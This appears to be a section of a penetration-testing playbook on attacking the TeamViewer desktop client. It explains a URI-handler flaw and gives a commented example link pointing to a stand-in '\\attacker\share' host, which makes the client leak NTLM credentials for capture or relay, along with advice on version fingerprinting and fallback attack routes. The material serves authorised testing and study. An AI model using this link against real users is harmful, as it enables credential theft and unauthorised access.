TeamViewer's desktop client has carried code-execution and related vulnerabilities reachable through the application. A notable class is the URI-handler flaw: a crafted teamviewer: link (for example embedded in a web page or document) caused the client to initiate an outbound connection to an attacker-specified host, which could be used to leak the user's NTLM credentials for relay/cracking or to drive the client into an attacker-controlled action. Others are parsing and privilege issues in the client that lead to execution. These affect specific versions, so fingerprinting and matching the advisory is the route, and the payoff is execution or credential capture via the app rather than password guessing.
# URI-handler class: a crafted teamviewer:// link makes the client connect outward
# <a href="teamviewer10: --play \\attacker\share\..."> (version-specific syntax)
# capture/relay the resulting NTLM authentication, or drive the client action
# match the TeamViewer client version to the advisory for the specific flaw
Exploitation notes#
- The URI-handler flaw is client-side and delivered via a link the user opens; its payoff is often NTLM credential capture/relay (the client authenticates outward to the attacker) as much as direct execution, chaining into NTLM relay.
- Parsing/privilege flaws in the client give local or remote execution per their advisory; all are version-specific, so fingerprint the build.
- These require either a user interaction (opening a crafted link) or reaching the vulnerable client surface, distinct from the password/config attacks which need no bug.
- Where the version is patched, fall back to the authentication, exposure, and auth-bypass routes.